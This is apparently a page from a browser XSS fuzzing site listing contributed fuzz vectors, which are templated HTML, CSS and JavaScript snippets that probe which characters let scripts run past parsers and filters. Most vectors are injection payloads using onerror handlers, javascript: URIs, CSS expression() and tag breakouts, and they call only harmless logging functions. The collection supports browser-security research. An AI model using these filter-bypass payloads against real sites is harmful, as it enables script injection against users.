Featured vector
IE 9.0
<script>alert(1,1</script0x32a2/)</script>
<script>alert(1,1</script0x32a2/)</script>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTM HTML JavaScript New Script TTM XSS attribute close colon data datauri elements escaping event events expression handler html4 inline innerHTML lines obfuscation padding properties quote regex regexp self selfxss separation space spaces string strings style svg syntax tag tags trim uri vbs vbscript xml
907,629 Successful fuzzes
Fuzz Vectors
Vectors not scanned by this browser
| Description | Vector | Created by |
|---|---|---|
| aaaaaaaa | <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @PunchyStickMeh |
| Alternatives to in attributes | <img src=# onerror*chr*"log(*num*)" > | @albinowax |
| Attribute separators | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @garethheyes |
| Break out of title | <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> | @0xAli |
| Char after lt | <*chr*script>alert(*num*)</script> | @ethicalhack3r |
| Char that allows you to act as a slash in closing tag 2 | <script>log(*num*)<*chr*script></script> | @notxssninja |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> | @garethheyes |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters allowed after colon in url | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after colon in url (no slashes) | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after paren rule | <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> | @garethheyes |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| Characters allowed after slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as gt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as h in http | <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as lt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as s in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as _ in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed attribute quote | "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> | @jackmasa |
| Characters allowed before a JavaScript function | "`'><script>*chr*log(*num*)</script> | @garethheyes |
| Characters allowed before CSS properties | '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> | @garethheyes |
| Characters allowed between CSS colon and expression | ABC<div style="x:*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 01 | ABC<div style="x:exp*chr*ression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 02 | ABC<div style="x:expression*chr*(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS prop and expression | ABC<div style="x*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between slashes | <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed between tag and attribute | <script*chr*type="text/javascript">log(*num*);</script> | @0xAli |
| Characters allowed for padding in a data URI 002 | <script src="data:*chr*,log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 003 | <script src="data:text/plain*chr*log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 001 | <iframe src="vbs:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 002 | <iframe src="vbscript:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before rgb | <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters between rgb | <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> | @garethheyes |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Characters eating backslash in javascript string | <script>if("x\*chr*".length==1) { log(*num*);}</script> | @mhswende |
| Characters eating backslash in javascript string 2 | <script>if("x\*chr*".length==2) { log(*num*);}</script> | @mhswende |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters ignored in Javascript function call | "`'><script>lo*chr*g(*num*)</script> | @mhswende |
| Characters ignored inside javascript string v2 | <script>if("x*chr*x" == "xx") { log(*num*);}</script> | @mhswende |
| Characters in script inside XML elements 001 | <p><svg><script>*chr*log(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 002 | <p><svg><script>l*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 003 | <p><svg><script>*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters not encoded by encodeURI | <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters not encoded by encodeURIComponent | <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters separating attributes without quotes | <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> | @garethheyes |
| Characters separating attributes without quotes after hash | <img src=xx:xx#*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters syntactically equivalent to colon in a URI | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters syntactically equivalent to single quote in HTML attributes | `"'><img src='#*chr* onerror=log(*num*)> | @_cweb |
| Characters that are new lines | <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that are spaces | <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters that close a HTML comment 3 | --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> | @DOMXss |
| Characters that close a quote | <script charset="*chr*>log(*num*)</script> | @0xAli |
| Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Characters trimmed my trim | <script> if ('*chr*'.trim() === '') { log(*num*); } </script> | @shafigullin |
| Characters which break attributes without quotes | <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> | @shafigullin |
| determine any chars can go between the onerror attributes | <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> | @MisterJyu |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Determine what character can replace in end tags | <script>log(*num*)<*chr*script> | @MisterJyu |
| determine what characters can be inside a script tag | "`'><sc*chr*ript>log(*num*)</sc*chr*ript> | @MisterJyu |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Escape from attribute a closing tag | <a href="*chr*><script>log(*num*)</script>" /> | @shafigullin |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| foobar | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* | @Sidhpurwala |
| Hex characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> | @garethheyes |
| JS in img src for selfxss | <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> | @ethicalhack3r |
| NULL Characters inside JavaScript properties | `'"><script>window['log*chr*'](*num*)</script> | @garethheyes |
| Opening paren expression check | <div style="xss:expression(logChr*chr**num*))">test</div> | @garethheyes |
| prime browser | <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @thetestmanager |
| Quoteless attributes breaker | <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> | @garethheyes |
| Replacement for greater and less than signs | *chr*script*chr alert(1) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater and less than signs (revised) | *chr*script*chr* log(*num*) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater than sign | *chr*script>log(*num*)</script> | @mhswende |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Single quote break | <script charset='*chr*>log(*num*)</script> | @0xAli |
| Space characters in RegExp | <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> | @shafigullin |
| Valid characters after expression | <div style="xss:expression(logChr(*num*))*chr*junk"></div> | @garethheyes |
| Valid characters after expression 2 | <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> | @garethheyes |
| Valid characters after expression 3 | <div style="xss:expression(logChr(*num*))'*chr*junk"></div> | @garethheyes |
| Valid characters after expression 4 | <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> | @garethheyes |
All vectors
| Description | Vector | Created by |
|---|---|---|
| aaaaaaaa | <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @PunchyStickMeh |
| Alternatives to in attributes | <img src=# onerror*chr*"log(*num*)" > | @albinowax |
| Array variables | <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Attribute separators | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @garethheyes |
| Break out of title | <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> | @0xAli |
| Char after lt | <*chr*script>alert(*num*)</script> | @ethicalhack3r |
| Char that allows you to act as a slash in closing tag 2 | <script>log(*num*)<*chr*script></script> | @notxssninja |
| Character between lt and slash in closing tag | <script>log(*num*)<*chr*/script> | @shafigullin |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> | @garethheyes |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters allowed after colon in url | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after colon in url (no slashes) | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after paren rule | <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> | @garethheyes |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| Characters allowed after slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after uri host | "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> | @jackmasa |
| Characters allowed as gt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as h in http | <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as lt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as s in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as _ in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed attribute quote | "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> | @jackmasa |
| Characters allowed before a JavaScript function | "`'><script>*chr*log(*num*)</script> | @garethheyes |
| Characters allowed before attribute name | `"'><img src=xxx:x *chr*onerror=log(*num*)> | @garethheyes |
| Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before CSS properties | '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> | @garethheyes |
| Characters allowed before paren | <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> | @garethheyes |
| Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed between CSS colon and expression | ABC<div style="x:*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 01 | ABC<div style="x:exp*chr*ression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 02 | ABC<div style="x:expression*chr*(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS prop and expression | ABC<div style="x*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between slashes | <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed between tag and attribute | <script*chr*type="text/javascript">log(*num*);</script> | @0xAli |
| Characters allowed for padding in a data URI 001 | <script src="data:text/plain,lo*chr*g(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 002 | <script src="data:*chr*,log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 003 | <script src="data:text/plain*chr*log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 001 | <iframe src="vbs:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 002 | <iframe src="vbscript:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before paren in Javascript call | "'`><script>log*chr*(*num*)</script> | @garethheyes |
| Characters before rgb | <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters between rgb | <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> | @garethheyes |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Characters consuming backslashes and breaking JS strings | <script>a='abc\*chr*\';log(*num*)//def';</script> | @0x6D6172696F |
| Characters eating backslash in javascript string | <script>if("x\*chr*".length==1) { log(*num*);}</script> | @mhswende |
| Characters eating backslash in javascript string 2 | <script>if("x\*chr*".length==2) { log(*num*);}</script> | @mhswende |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters ignored in Javascript function call | "`'><script>lo*chr*g(*num*)</script> | @mhswende |
| Characters ignored inside javascript string v2 | <script>if("x*chr*x" == "xx") { log(*num*);}</script> | @mhswende |
| Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters in script inside XML elements 001 | <p><svg><script>*chr*log(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 002 | <p><svg><script>l*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 003 | <p><svg><script>*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 004 | "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> | @0x6D6172696F |
| Characters not encoded by encodeURI | <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters not encoded by encodeURIComponent | <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters separating attributes without quotes | <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> | @garethheyes |
| Characters separating attributes without quotes after hash | <img src=xx:xx#*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters syntactically equivalent to colon in a URI | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters syntactically equivalent to single quote in HTML attributes | `"'><img src='#*chr* onerror=log(*num*)> | @_cweb |
| Characters that are new lines | <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that are spaces | <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Characters that close a HTML comment | --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> | @garethheyes |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters that close a HTML comment 3 | --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> | @DOMXss |
| Characters that close a quote | <script charset="*chr*>log(*num*)</script> | @0xAli |
| Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Characters trimmed my trim | <script> if ('*chr*'.trim() === '') { log(*num*); } </script> | @shafigullin |
| Characters which break attributes without quotes | <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> | @shafigullin |
| determine any chars can go between the onerror attributes | <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> | @MisterJyu |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Determine what character can replace in end tags | <script>log(*num*)<*chr*script> | @MisterJyu |
| determine what characters can be inside a script tag | "`'><sc*chr*ript>log(*num*)</sc*chr*ript> | @MisterJyu |
| Document body variables | <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Document variables | <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> | @garethheyes |
| Does this browser support e4x | <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> | @garethheyes |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Escape from attribute a closing tag | <a href="*chr*><script>log(*num*)</script>" /> | @shafigullin |
| Events in tags with src or href that execute javascript | <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| foobar | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* | @Sidhpurwala |
| Function variables | <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Hex characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> | @garethheyes |
| Iframe contentDocument properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Iframe contentWindow properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| JS in img src for selfxss | <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> | @ethicalhack3r |
| NULL Characters inside JavaScript properties | `'"><script>window['log*chr*'](*num*)</script> | @garethheyes |
| Number variables | <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Object variables | <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Opening paren expression check | <div style="xss:expression(logChr*chr**num*))">test</div> | @garethheyes |
| prime browser | <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @thetestmanager |
| Quoteless attributes breaker | <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> | @garethheyes |
| Regexp variables | <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Replacement for greater and less than signs | *chr*script*chr alert(1) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater and less than signs (revised) | *chr*script*chr* log(*num*) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater than sign | *chr*script>log(*num*)</script> | @mhswende |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Single quote break | <script charset='*chr*>log(*num*)</script> | @0xAli |
| Space characters in RegExp | <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> | @shafigullin |
| String variables | <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Tags and events that execute javascript | <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript 2 | <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags that execute onerror | <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> | @garethheyes |
| Uncode sequences generating illegitimate ASCII | <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> | @0x6D6172696F |
| Valid characters after expression | <div style="xss:expression(logChr(*num*))*chr*junk"></div> | @garethheyes |
| Valid characters after expression 2 | <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> | @garethheyes |
| Valid characters after expression 3 | <div style="xss:expression(logChr(*num*))'*chr*junk"></div> | @garethheyes |
| Valid characters after expression 4 | <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> | @garethheyes |
| Window variables | <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |